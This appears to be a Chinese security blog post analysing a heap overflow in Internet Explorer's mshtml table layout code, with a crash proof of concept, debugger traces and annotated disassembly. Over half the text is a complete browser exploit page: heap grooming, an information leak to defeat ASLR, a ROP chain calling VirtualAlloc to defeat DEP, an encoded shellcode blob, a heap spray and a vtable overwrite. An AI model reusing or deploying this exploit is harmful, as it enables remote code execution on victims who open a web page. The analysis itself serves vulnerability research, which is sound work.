首先用windbg附加进程ie页面内容进程,!gflag +hpa添加堆尾检查,.childdbg 1允许子进程调试,然后加载POC。
POC:
<html> <body> <table style="table-layout:fixed" > <col id="132" width="41" span="1" >  </col> </table> <script> function over_trigger() { var obj_col = document.getElementById("132"); obj_col.width = "42765"; obj_col.span = 1000; } setTimeout("over_trigger();",1); </script> </body> </html>
附加后断在这个位置,可以看到这里由于[EDI]内容不可写已经导致崩溃,下面我们分析一下什么地方导致的[EDI]不可写。
在这个位置栈回溯
首先从mshtml!CTableColCalc::AdjustForCol开始分析,uf mshtml!CTableColCalc::AdjustForCol
1:022> uf mshtml!CTableColCalc::AdjustForCol mshtml!CTableColCalc::AdjustForCol: 67ebf152 8bff mov edi,edi 67ebf154 55 push ebp 67ebf155 8bec mov ebp,esp 67ebf157 8b08 mov ecx,dword ptr [eax] 67ebf159 53 push ebx 67ebf15a 8b5d08 mov ebx,dword ptr [ebp+8] 67ebf15d 57 push edi 67ebf15e 8bc1 mov eax,ecx 67ebf160 83e00f and eax,0Fh 67ebf163 8d7e18 lea edi,[esi+18h] //这里对edi赋值了 …以下无用代码省略
反汇编可以看到mshtml!CTableColCalc::AdjustForCol这个函数只有67ebf163这里对edi进行了赋值,但是mshtml!CTableColCalc::AdjustForCol在对edi赋值之前并没有对esi进行过赋值,所以继续反汇编上层函数mshtml!CTableLayout::CalculateMinMax
这里我们在IDA里加载符号表分析一下CTableLayout::CalculateMinMax这个函数
.text:74D3018A mov edi, edi //巨硬为了INLINE HOOK时方便函数前五字节覆盖做的优化 .text:74D3018C push ebp .text:74D3018D mov ebp, esp .text:74D3018F sub esp, 90h //开辟栈帧 .text:74D30195 push ebx //栈回溯上层函数,tagSIZE * .text:74D30196 mov ebx, [ebp+arg_0] //ebx=参数1=CTableLayout .text:74D30199 push esi //栈回溯上层函数,CTableCalcInfo * .text:74D3019A mov esi, [ebp+arg_4] //esi=参数2 .text:74D3019D mov eax, [esi+28h] .text:74D301A0 mov [ebp+var_8C], eax .text:74D301A6 mov eax, [ebx+54h] //eax=span属性的和 .text:74D301A9 mov [ebp+arg_0], eax …省略无用代码 .text:74D30293 loc_74D30293: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+105↑j .text:74D30293 mov edx, [ebp+arg_0] //edx=span属性的和 .text:74D30296 mov eax, edx .text:74D30298 sub eax, ecx .text:74D3029A mov [ebp+var_1C], eax .text:74D3029D push 0 .text:74D3029F pop eax .text:74D302A0 setz al .text:74D302A3 mov [ebx+50h], ecx .text:74D302A6 shl eax, 8 .text:74D302A9 xor eax, [ebx+44h] .text:74D302AC and eax, 100h .text:74D302B1 xor [ebx+44h], eax .text:74D302B4 test byte ptr [esi+2Ch], 1 .text:74D302B8 jnz loc_74C5EE4D .text:74D302BE .text:74D302BE loc_74D302BE: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)-D133B↑j .text:74D302BE xor eax, eax .text:74D302C0 .text:74D302C0 loc_74D302C0: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1957B9↓j .text:74D302C0 or [ebp+var_38], eax .text:74D302C3 cmp [ebp+nDenominator], edi .text:74D302C6 jnz loc_74EC5948 .text:74D302CC mov eax, [ebx+94h] //eax=CTableLayout+94H,记为spancmp .text:74D302D2 shr eax, 2 //eax>>2 .text:74D302D5 cmp eax, edx //edx=span属性的和,记为spansum .text:74D302D7 jge short loc_74D30312 .text:74D302D9 cmp edx, edi .text:74D302DB lea esi, [ebx+90h] .text:74D302E1 jl loc_74C2CE82 .text:74D302E7 cmp edx, [esi+8] .text:74D302EA jbe short loc_74D302FF .text:74D302EC push 1Ch ; Size .text:74D302EE mov eax, edx .text:74D302F0 mov edi, esi .text:74D302F2 call ?EnsureSizeWorker@CImplAry@@AAEJIJ@Z ; CImplAry::EnsureSizeWorker(uint,long) //跟进这个函数发现在这里开辟堆空间 .text:74DF8FB7 mov edi, edi .text:74DF8FB9 push ebp .text:74DF8FBA mov ebp, esp .text:74DF8FBC push ecx .text:74DF8FBD push ecx .text:74DF8FBE push ebx .text:74DF8FBF push esi .text:74DF8FC0 mov esi, eax .text:74DF8FC2 push 4 .text:74DF8FC4 pop eax .text:74DF8FC5 mov [ebp+var_4], eax .text:74DF8FC8 cmp esi, eax .text:74DF8FCA jnb loc_74E02CB4 .text:74DF8FD0 .text:74DF8FD0 loc_74DF8FD0: ; CODE XREF: CImplAry::EnsureSizeWorker(uint,long)+9D00↓j .text:74DF8FD0 ; CImplAry::EnsureSizeWorker(uint,long)+9D25↓j ... .text:74DF8FD0 mov eax, [ebp+var_4] //eax=4 .text:74DF8FD3 mul [ebp+Size] //Size*4,Size至少0X1C .text:74DF8FD6 push edx .text:74DF8FD7 push eax .text:74DF8FD8 lea eax, [ebp+dwBytes] .text:74DF8FDB call ?ULongLongToUInt@@YGJ_KPAI@Z ; ULongLongToUInt(unsigned __int64,uint *) .text:74DF8FE0 mov ebx, eax .text:74DF8FE2 test ebx, ebx .text:74DF8FE4 jnz short loc_74DF900B .text:74DF8FE6 test byte ptr [edi+4], 2 .text:74DF8FEA jnz loc_74E3BEEC .text:74DF8FF0 push [ebp+dwBytes] ; dwBytes .text:74DF8FF3 lea esi, [edi+0Ch] //esi=CTableLayout+0x90+0xC,HeapRealloc返回的地址,记为vulheap .text:74DF8FF6 call ?_HeapRealloc@@YGJPAPAXI@Z ; _HeapRealloc(void * *,uint) 上面代码段的逻辑是(spancmp>>2)<spansum则开辟漏洞堆空间,漏洞堆空间的地址保存在CTableLayout+0x90+0xc .text:74EC5AB0 push 0 .text:74EC5AB2 push esi .text:74EC5AB3 call ?GetPixelWidth@CWidthUnitValue@@QBEHPBVCDocInfo@@PAVCElement@@H@Z ; CWidthUnitValue::GetPixelWidth(CDocInfo const *,CElement *,int) .text:74EC5AB8 cmp [ebp+var_5C], 0 .text:74EC5ABC mov [ebp+var_2C], eax //copydata=width*100 …省略无用代码 .text:74EC5B3E mov eax, [ebp+nDenominator] //span=1000 .text:74EC5B41 imul ecx, 1Ch .text:74EC5B44 add [ebp+var_38], eax .text:74EC5B47 mov [ebp+var_20], ecx .text:74EC5B4A jmp short loc_74EC5B4F .text:74EC5B4C ; --------------------------------------------------------------------------- .text:74EC5B4C .text:74EC5B4C loc_74EC5B4C: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+195A11↓j .text:74EC5B4C mov ecx, [ebp+var_20] .text:74EC5B4F .text:74EC5B4F loc_74EC5B4F: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959C0↑j .text:74EC5B4F mov eax, [ebx+9Ch] //eax=vulheap .text:74EC5B55 add eax, ecx //eax=vulheap+span*0x1c .text:74EC5B57 cmp [ebp+var_1C], 0 .text:74EC5B5B mov [ebp+var_24], eax .text:74EC5B5E jz short loc_74EC5B7A .text:74EC5B60 mov eax, [ebp+nDenominator] .text:74EC5B63 cmp eax, 1 .text:74EC5B66 jle short loc_74EC5B7A .text:74EC5B68 dec eax .text:74EC5B69 cmp [ebp+var_14], eax .text:74EC5B6C jnz short loc_74EC5B7A .text:74EC5B6E imul eax, [ebp+var_C] .text:74EC5B72 mov ecx, [ebp+var_2C] //ecx=copydata .text:74EC5B75 sub ecx, eax .text:74EC5B77 mov [ebp+var_C], ecx //[ebp-c]=span*0x1c .text:74EC5B7A .text:74EC5B7A loc_74EC5B7A: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959D4↑j .text:74EC5B7A ; CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959DC↑j ... .text:74EC5B7A push [ebp+var_3C] .text:74EC5B7D mov eax, [ebp+var_34] .text:74EC5B80 push [ebp+arg_4] .text:74EC5B83 mov esi, [ebp+var_24] .text:74EC5B86 push [ebp+var_C] //copydata .text:74EC5B89 call ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)
这里我们继续查看一下AdjustForCol这个函数
这里以EAX的内容按位与0xF的结果作为循环次数,依次把CWidthUnitValue *a4的内容复制到esi,最终导致溢出。
这几天心态有点崩,VUPEN的EXP详细分析先放着吧,需要绕过ASLR和DEP。大致思路是利用堆溢出读取CButtonLayout的虚表指针,这个虚表指针和漏洞DLL的偏移是一个固定值,所以这样可以绕过ASLR(至于CButtonLayout本身处于堆空间,也受ASLR影响,我们可以得到这个指针值的原因是CButtonLayout位于Vulheap的固定偏移处,这个偏移量是0X300+8*3+4,即3个0X100的堆块+3个块首大小+4字节虚表指针)。DEP的绕过是构造一个ROP调用VirtualProtect修改内存属性。然后再通过堆喷射把ROP链和SHELLCODE喷射到可预测地址。
关于里边详细的原理等变强了有时间再补吧。。
深深的感慨漏洞利用的艺术,学无止境,现在真的还太菜
<html>
<body>
<div id="test"></div>
<script language='javascript'>
var leak_index = -1;
var dap = "EEEE";
while ( dap.length < 480 ) dap += dap;
var padding = "AAAA";
while ( padding.length < 480 ) padding += padding;
var filler = "BBBB";
while ( filler.length < 480 ) filler += filler;
//spray
var arr = new Array();
var rra = new Array();
var div_container = document.getElementById("test");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
// E
rra[i] = dap.substring(0, (0x100-6)/2);
// S, bstr = A
arr[i] = padding.substring(0, (0x100-6)/2);
// A, bstr = B
arr[i+1] = filler.substring(0, (0x100-6)/2);
// B
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
rra[i] = null;
CollectGarbage();
}
</script>
<table style="table-layout:fixed" ><col id="0" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="1" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="2" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="3" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="4" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="5" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="6" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="7" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="8" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="9" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="10" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="11" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="12" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="13" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="14" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="15" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="16" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="17" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="18" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="19" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="20" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="21" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="22" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="23" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="24" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="25" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="26" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="27" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="28" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="29" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="30" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="31" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="32" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="33" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="34" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="35" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="36" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="37" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="38" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="39" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="40" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="41" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="42" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="43" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="44" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="45" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="46" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="47" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="48" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="49" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="50" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="51" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="52" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="53" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="54" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="55" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="56" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="57" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="58" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="59" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="60" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="61" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="62" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="63" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="64" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="65" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="66" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="67" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="68" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="69" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="70" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="71" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="72" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="73" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="74" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="75" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="76" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="77" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="78" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="79" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="80" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="81" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="82" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="83" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="84" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="85" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="86" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="87" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="88" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="89" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="90" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="91" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="92" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="93" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="94" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="95" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="96" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="97" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="98" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="99" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="100" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="101" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="102" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="103" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="104" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="105" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="106" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="107" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="108" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="109" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="110" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="111" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="112" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="113" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="114" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="115" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="116" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="117" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="118" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="119" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="120" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="121" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="122" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="123" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="124" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="125" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="126" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="127" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="128" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="129" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="130" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="131" width="41" span="9" >  </col></table><table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
<script language='javascript'>
var obj_col = document.getElementById("132");
obj_col.span = 19;
function over_trigger() {
var leak_addr = -1;
for ( var i = 0; i < 500; i++ ) {
if ( arr[i].length > (0x100-6)/2 ) { // overflowed
leak_index = i;
var leak = arr[i].substring((0x100-6)/2+(2+8)/2, (0x100-6)/2+(2+8+4)/2);
leak_addr = parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 );
mshtmlbase = leak_addr - Number(0x001582b8);
alert(mshtmlbase);
break;
}
}
if ( leak_addr == -1 || leak_index == -1 ) { alert("memory leak failed...."); }
//return mshtmlbase;
}
// A very special heap spray
function heap_spray(){
CollectGarbage();
var heapobj = new Object();
// generated with mona.py (mshtml.dll v)
function rop_chain(mshtmlbase){
var arr = [
mshtmlbase + Number(0x00001031),
mshtmlbase + Number(0x00002c78), // pop ebp; retn
mshtmlbase + Number(0x0001b4e3), // xchg eax,esp; retn (pivot)
mshtmlbase + Number(0x00352c8b), // pop eax; retn
mshtmlbase + Number(0x00001340), // ptr to &VirtualAlloc() [IAT]
mshtmlbase + Number(0x00124ade), // mov eax,[eax]; retn
mshtmlbase + Number(0x000af93e), // xchg eax,esi; and al,0; xor eax,eax; retn
mshtmlbase + Number(0x00455a9c), // pop ebp; retn
mshtmlbase + Number(0x00128b8d), // & jmp esp
mshtmlbase + Number(0x00061436), // pop ebx; retn
0x00000001, // 0x00000001-> ebx
mshtmlbase + Number(0x0052d8a3), // pop edx; retn
0x00001000, // 0x00001000-> edx
mshtmlbase + Number(0x00003670), // pop ecx; retn
0x00000040, // 0x00000040-> ecx
mshtmlbase + Number(0x001d263d), // pop edi; retn
mshtmlbase + Number(0x000032ac), // retn
mshtmlbase + Number(0x00352c9f), // pop eax; retn
0x90909090, // nop
mshtmlbase + Number(0x0052e805), // pushad; retn
0x90909090,
0x90909090,
0x90909090,
0x90909090,
0x90909090,
];
return arr;
}
function d2u(dword){
var uni = String.fromCharCode(dword & 0xFFFF);
uni += String.fromCharCode(dword>>16);
return uni;
}
function tab2uni(heapobj, tab){
var uni = ""
for(var i=0;i<tab.length;i++){
uni += heapobj.d2u(tab[i]);
}
return uni;
}
heapobj.tab2uni = tab2uni;
heapobj.d2u = d2u;
heapobj.rop_chain = rop_chain;
var code = unescape("%u40b0%u414b%u1d24%ub4a8%u7799%ube37%ua947%ud41a%u353f%ueb30%ud133%u2ae1%u31e0%ue2d3%u1514%ufd13%u3497%u7a7b%ufc39%u92ba%u9390%u0a4e%ubbf5%u8db2%ue385%uf823%ud53a%u0448%u750d%ud632%u707c%u4642%u7e78%ub12c%u2f98%u1c3c%u727e%u3b7b%u4fe0%ue38c%u4f76%u81b0%u2de2%u35ba%u86bb%u67f8%u8d0c%u9190%u7574%u7f71%u7d3c%u9f15%ub347%ud50b%u784e%u4970%u1b37%uc1ff%uc6fe%uc0c7%ub6d4%u9246%ub4b1%uf588%ua91d%u7c4b%u2548%u7a99%u9b3d%u01b7%u34eb%u1cb5%u38a8%ub8fc%ud609%ube4a%u9714%ue121%ub904%u42b2%u7796%u6924%u80f9%u0dfd%u412c%u2f05%u273f%ubf40%u9893%u7343%u6679%u77a8%ub63f%u7472%u707b%u843d%uebd2%uf630%ubfd5%u71b2%u757a%u1848%u0cf5%u96b7%uf889%u764a%u9b2d%u92b0%u66be%u7d97%ub425%u9114%u4904%uba34%u421c%ue308%uf902%u4140%u4773%u0d27%u93b5%u2299%u1dd4%u7c4f%u2867%u98fc%u2c24%ue212%ufd03%u78a9%u3505%u8390%u2fe0%u4337%u154b%u468d%u79b9%u297f%ubbd6%u197e%u4ee1%u9fb8%ub1b3%u4a3c%u7a7d%u7679%u4670%u2091%u74e1%ub043%u4e71%ub590%u75b7%u983c%u4bb3%ud687%uf86b%u9b40%u117f%ud1f7%u7bf9%u152f%u3427%u1d92%u3d97%u2d49%u720d%u014f%u7ce0%u3105%u10eb%u35f5%ub4b6%u1c2c%u93b2%u4704%ud52b%ubbb1%ue389%u4137%u7e78%u733f%u7742%u2925%ufcd0%u6624%u8dba%u67b9%u1a96%ua8fd%ua9be%ud40b%u4899%u9f14%u87bf%ue2f7%ub80c%u903d%u14b0%u25bb%u7d96%u1a7f%u79f5%uf809%u347c%u7b91%u4e47%ueb81%ue122%ud41b%u7074%ub21d%u2d72%u928d%ub3b1%ua905%u71b4%u4b0c%u9343%u0d76%u989f%u84b5%ub7d5%u4666%ube40%ub8bf%u201c%u48e2%u4a73%u6b2c%u2afc%u04e0%u4941%u3777%u10ba%u7ed6%u332f%ub9fd%u7a9b%u7875%u2415%u1299%uf9d2%u3f97%ub63c%u3567%u27a8%ue386%u7742%u4f73%ue380%ua93c%u757c%uf62b%ud0c0%u27e0%u214b%ue1d3%ub93f%u157d%u8c14%ue2c1%u9904%u7498%u7071%u6637%ueb28%u4e1c%u7fb6%u357b%u3297%u25d4%uf569%u9105%u4047%u0224%u78d6%u7941%uba3d%u49b1%u7276%u1d2f%u85bf%u67fc%u7e92%u4a2c%u7ab4%u1348%u93d5%u8d9b%u03bb%u74fd%u0879%u43e1%ue083%u1873%u46e3%u2372%ub2f8%u88b0%ub8f9%u969f%u75b5%u770c%u7b42%ub72d%u7aa8%ue219%ueb38%ub334%u90be%u4f7e%u0d7f%ub3b6%u3076%ubff5%u479f%u7167%ud40a%u3b7c%u66fc%u41b7%u9615%u3dfd%u3505%ub825%u1c7d%ub54a%u3940%u37d6%u3f92%u971d%u1478%u8d49%ua8b2%u3493%u2c3c%u902f%ud54f%u04a9%u1198%u91f8%ub99b%u9943%ubbb1%u0d70%u4824%u4b0c%ube4e%ub02d%uf93a%u27ba%ub446%udb42%ud9d1%u2474%u5af4%uc929%u49b1%u8cbe%uc04a%u31a0%u1972%uc283%u0304%u1572%ubf6e%u483c%u40e7%u89bd%uc997%ub858%uae85%ue929%ua419%u027c%ue8d2%u9194%u2496%u129a%u131c%ua395%u9b91%u6779%u67b0%ub480%u5912%uc94b%u9e53%u22b6%u7701%u91bc%ufcb5%u2980%ud2b4%u128e%u57ce%ue650%u5964%u5781%u11f3%ud339%u825b%u3038%ufeb8%u3d73%u740a%u9782%u7543%ud7b4%u480f%uda78%u8c4e%u05bf%ue625%ub8c3%u3d3d%u66b9%ua0c8%uec19%u016a%u219b%uc2ec%u8e97%u8c7b%u11bb%ua6a8%u9ac0%u694f%ud841%uad6b%uba09%uf412%u6df7%ue62b%ud150%u6c89%u0672%u2eab%ueb1b%ud081%u63db%ua392%u2ce9%u2c08%ua442%uab96%u9fa5%u236e%u2058%u6d8e%u749f%u05de%uf536%ud5b5%u20b7%u8619%u9b17%u76d9%u4bd8%u9cb1%ub4d7%u9ea1%udd3d%u644b%u22d6%u6723%ucb43%u6831%u579a%u8ebc%u77f6%u19e8%ue16f%ud2b1%uee0e%u9f6c%u6411%u5f82%u8ddf%u73ef%u7d88%u2eba%u811f%u4411%u17a0%ucf9d%u8ff7%u369f%u103f%u1d60%u994b%udef4%ue624%udf18%ub0b4%udf72%u64dc%u8c26%u6af9%ua0f3%uff51%u90fb%ua806%u1e93%u9e70%ue03c%u1e57%u3701%ua49e%u3d73%u64f2");
var rop_chain = heapobj.tab2uni(heapobj, heapobj.rop_chain(mshtmlbase)) ;
var shellcode = rop_chain + code
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<400; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function smash_vtable(){
var obj_col_0 = document.getElementById("132");
obj_col_0.width = "1178993"; // smash the vftable 0x07070024
obj_col_0.span = "44"; // the amount to overwrite
}
var mshtmlbase = "";
setTimeout("over_trigger();",1);
setTimeout("heap_spray();",400);
setTimeout("smash_vtable();",700);
</script>
</body>
</html>